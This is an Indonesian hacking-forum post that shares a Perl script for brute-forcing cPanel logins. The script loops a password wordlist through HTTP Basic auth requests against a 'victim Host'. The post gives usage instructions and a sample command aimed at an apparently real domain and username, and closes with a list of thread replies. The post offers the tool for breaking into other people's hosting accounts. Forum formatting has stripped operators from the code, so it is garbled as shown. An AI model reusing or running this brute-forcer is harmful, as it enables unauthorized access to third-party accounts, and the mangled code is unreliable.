Cpanel Bruteforce Tool
#1
Halo Semua ! Bertemu Lagi Dengan NoseTrave Yang Paling Ganteng Se Forum! (Hah Zee? Siapatuh? Masih Gantengan Gua Kali) lol,

Kali Ini Aku Mau Share Tentang Tool Yang Satu Ini

Langsung Aja Surge Nya
PHP Code:
#!/usr/bin/perl
# Cpanel Password Brute Forcer
# ----------------------------
# (c)oded By Hessam-x
# Perl Version ( low speed )
# Oerginal Advisory :
# http://www.simorgh-ev.com/advisory/2006/cpanel-bruteforce-vule/
use IO::Socket;
use 
LWP::Simple;
use 
MIME::Base64;

$host $ARGV[0];
$user $ARGV[1];
$port $ARGV[2];
$list $ARGV[3];
$file $ARGV[4];
$url "http://".$host.":".$port;
if(@
ARGV 3){
print 
q(
################################################## #############
# Cpanel Password Brute Force Tool #
################################################## #############
# usage : cpanel.pl [HOST] [User] [PORT][list] [File] #
#-------------------------------------------------------------#
# [Host] : victim Host (simorgh-ev.com) #
# [User] : User Name (demo) #
# [PORT] : Port of Cpanel (2082) #
#[list] : File Of password list (list.txt) #
# [File] : file for save password (password.txt) #
# #
################################################## #############
# (c)oded By Hessam-x / simorgh-ev.com #
################################################## #############
);exit;}

headx();

$numstart "-1";

sub headx() {
print 
q(
################################################## #############
# Cpanel Password Brute Force Tool #
# (c)oded By Hessam-x / simorgh-ev.com #
################################################## #############
);
open (PASSFILE"<$list") || die "[-] Can't open the List of password file !";
@
PASSWORDS = <PASSFILE>;
close PASSFILE;
foreach 
my $P (@PASSWORDS) {
chomp $P;
$passwd $P;
print 
"
[~] Try Password : 
$passwd
"
;
&
brut;
};
}
sub brut() {
$authx encode_base64($user.":".$passwd);
print 
$authx;
my $sock IO::Socket::INET->new(Proto => "tcp",PeerAddr => "$host"PeerPort => "$port") || print "
[-] Can not connect to the host"
;
print 
$sock "GET / HTTP/1.1
"
;
print 
$sock "Authorization: Basic $authx
"
;
print 
$sock "Connection: Close

"
;
read $sock$answer128;
close($sock);

if (
$answer =~ /Moved/) {
print 
"
[~] PASSWORD FOUND : 
$passwd
"
;
exit();
}

Simpan Dengan nama cpanel.pl

Cara Pakainya Sederhana:
PHP Code:
perl cpanel.pl [HOST] [User] [PORT] [list] [File
Pengertian: -Host: Website Cpanel Yang Menjadi Target.
-User: username Nya!
-Port Cpanelnya (Biasanya 2082)
-List: Password list Ente (Yang Belum Punya Download Di IBT ato Google)
-File: File Untuk Menempatkan Hasil

Nah Ini Contoh Live Nya:
PHP Code:
root@Anarc0de:~# perl cpanel.pl thehopebuster.us ares 2082 /root/Desktop/dictionary.txt /root/Desktop/password.txt 



Sekian Dari NoseTrave!
Sangat Butuh Ijo-Ijo! (Buat Menangin Hosting)

Maaf Kalo Ada Salah Salah Kata!, Akhir Kata Terimakasih
root@nosetrave:~# ./plagiat.sh
English motherfucker, do you speak it ?
root@nosetrave:~#



Messages In This Thread
Cpanel Bruteforce Tool - by NoseTrave - 10-19-2011, 11:14 AM
RE: Cpanel Bruteforce Tool - by guitariznoize - 10-19-2011, 11:34 AM
RE: Cpanel Bruteforce Tool - by nonot - 10-19-2011, 11:48 AM
RE: Cpanel Bruteforce Tool - by NoseTrave - 10-19-2011, 11:50 AM
RE: Cpanel Bruteforce Tool - by betefive - 10-19-2011, 01:56 PM
RE: Cpanel Bruteforce Tool - by THJC - 10-19-2011, 05:15 PM
RE: Cpanel Bruteforce Tool - by koecroet - 10-19-2011, 08:00 PM
RE: Cpanel Bruteforce Tool - by NoseTrave - 10-19-2011, 09:21 PM
RE: Cpanel Bruteforce Tool - by koecroet - 10-23-2011, 06:46 PM
RE: Cpanel Bruteforce Tool - by shadowsmaker - 11-09-2011, 10:24 AM
RE: Cpanel Bruteforce Tool - by guitariznoize - 10-23-2011, 09:42 PM
RE: Cpanel Bruteforce Tool - by koecroet - 10-24-2011, 08:13 PM
RE: Cpanel Bruteforce Tool - by alphairene6 - 11-23-2011, 12:24 AM
RE: Cpanel Bruteforce Tool - by koecroet - 10-24-2011, 01:19 AM
RE: Cpanel Bruteforce Tool - by THJC - 10-24-2011, 02:09 AM
RE: Cpanel Bruteforce Tool - by guitariznoize - 10-24-2011, 11:10 PM
RE: Cpanel Bruteforce Tool - by THJC - 10-25-2011, 01:00 AM
RE: Cpanel Bruteforce Tool - by NoseTrave - 11-02-2011, 11:00 PM
RE: Cpanel Bruteforce Tool - by betefive - 11-03-2011, 12:42 AM
RE: Cpanel Bruteforce Tool - by NoseTrave - 11-03-2011, 11:52 PM
RE: Cpanel Bruteforce Tool - by cassaprodigy - 11-04-2011, 12:57 AM
RE: Cpanel Bruteforce Tool - by NoseTrave - 11-08-2011, 08:20 PM
RE: Cpanel Bruteforce Tool - by koecroet - 01-05-2012, 09:51 PM
RE: Cpanel Bruteforce Tool - by xombix - 01-05-2012, 11:58 PM
RE: Cpanel Bruteforce Tool - by Al - Ayyubi - 06-01-2012, 10:51 AM
RE: Cpanel Bruteforce Tool - by panjigrek - 11-26-2012, 10:44 PM
RE: Cpanel Bruteforce Tool - by muring - 12-30-2012, 01:17 PM
RE: Cpanel Bruteforce Tool - by dumbastish - 02-01-2013, 03:10 AM
RE: Cpanel Bruteforce Tool - by abdilahrf - 02-02-2013, 08:16 PM
RE: Cpanel Bruteforce Tool - by 777r - 02-03-2013, 08:17 PM
RE: Cpanel Bruteforce Tool - by LAKIamat - 03-01-2013, 11:10 PM
RE: Cpanel Bruteforce Tool - by jincorn - 03-02-2013, 08:46 AM
RE: Cpanel Bruteforce Tool - by Unregistered - 03-02-2013, 11:49 PM
RE: Cpanel Bruteforce Tool - by g4nt3ng404 - 11-13-2016, 11:58 PM




Users browsing this thread: 1 Guest(s)